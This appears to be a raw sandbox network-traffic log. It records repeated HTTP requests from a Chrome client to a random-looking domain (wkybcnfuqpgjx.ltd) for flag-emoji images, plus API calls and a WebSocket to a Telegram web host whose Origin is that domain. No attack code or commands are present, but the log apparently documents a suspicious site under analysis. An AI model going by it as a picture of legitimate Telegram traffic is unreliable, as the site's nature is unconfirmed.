Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f3f4-200d-2620-fe0f.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1ec.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1fa.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1e7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ed.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ef.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f2.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: g+fGyrQDirUG79rAjQQZMA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1e7.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1fe.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ea.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1f6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1e6.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1fc.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e7-1f1ef.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
